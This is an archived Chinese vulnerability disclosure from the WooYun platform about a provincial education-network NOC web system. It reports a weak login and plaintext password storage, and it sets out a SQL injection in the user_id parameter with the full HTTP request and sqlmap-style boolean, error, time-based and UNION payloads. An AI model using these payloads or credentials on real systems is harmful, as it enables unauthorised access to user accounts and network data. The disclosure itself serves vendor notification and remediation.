乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-20: 细节已通知厂商并且等待厂商处理中 2015-12-25: 厂商已经确认,细节仅向厂商公开 2016-01-04: 细节向核心白帽子及相关领域专家公开 2016-01-14: 细节向普通白帽子公开 2016-01-24: 细节向实习白帽子公开 2016-02-06: 细节向公众公开
某省 ,烦请第三方合作机构 - CCERT教育网应急响应组联系处理
弱口令:
http://**.**.**.**/noc/user_login.php账号:mk密码:aaaaaa
密码明文存储在页面:登陆后在用户管理处查看其它用户信息,发现用户密码存在源码内
SQL注入+密码明文:user_id参数过滤不严
GET /noc/usermodi.php?user_lx=show&user_id=27 HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36Referer: http://**.**.**.**/noc/user.phpAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8Cookie: qhnu_noc[user]=mk; qhnu_noc[access]=2; hkj=ipbjf97ht6k1ppa42c0e92vb90; JSESSIONID=4C33615E92A6FB59CE0A27B6D0A674C9; userNameForAutomaticSignin=aaaaaaaaa; domainNameForAutomaticSignin=NULL; isADAuth=false; passwordForAutomaticSignin=aaaaaaaaaaa; signInAutomatically=true; flashversionInstalled=19.0.0
PayLoad:
Parameter: user_id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: user_lx=show&user_id=27 RLIKE (SELECT (CASE WHEN (2900=2900) THEN 27 ELSE 0x28 END)) Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: user_lx=show&user_id=27 AND (SELECT 7032 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(SELECT (ELT(7032=7032,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: user_lx=show&user_id=27 AND (SELECT * FROM (SELECT(SLEEP(5)))vJfV) Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: user_lx=show&user_id=-6284 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176786b71,0x6c48457778626256756a516f736c5a5966694a4458776e5a49544b5049486a74634946674e7a6354,0x71706b7071),NULL,NULL-- - Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL-- -
各 校 IP 地 址 段 :
线路与接入单位电话:
IP 地 址 使 用 情 况:
IP 地 址 使 用 管 理:
通过以上信息可得知该省教育网网络拓扑,为后续渗透作了良好铺垫。是否该重视呢
改 && 过滤。
危害等级:中
漏洞Rank:6
确认时间:2015-12-25 16:12
通知处理中
暂无